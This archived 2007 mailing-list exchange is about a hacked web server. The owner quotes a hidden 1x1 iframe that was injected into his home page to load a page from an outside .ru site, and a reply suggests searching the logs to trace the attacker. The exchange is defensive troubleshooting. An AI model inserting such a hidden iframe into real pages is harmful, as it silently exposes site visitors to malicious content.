[thelist] Server Hacked

Eduardo Kienetz eduardok at gmail.com
Sun Feb 18 20:41:58 CST 2007


On 2/18/07, Hershel Robinson <hershel at galleryrobinson.com> wrote:
> I have a site on a dedicated server. Today the home page started popping
> up two bizarre windows. After a brief search I discovered that someone
> put this code:
>
> <iframe src="http://www.newhold.ru/vl_pv.php" width="1" height="1"
> frameborder="0"></iframe>
>
> into the home page.
>
> Try going to that URL to see what happens. Using IE6 / Win 2K I had to
> use the Task Manager to kill the resultant IE windows.
>
> Bizarre hack to an English-language site.
>
> Hershel

Do you think it could be a cross site scripting problem?
I've seen that type of thing before. Is it an Apache+PHP) server? If
so, grep the word iframe in your log file (or maybe the world
newhold). That way you'll find the offending IP.

-- 
Eduardo  Bacchi Kienetz
LPI Certified - Level 2
http://www.noticiaslinux.com.br/eduardo/



More information about the thelist mailing list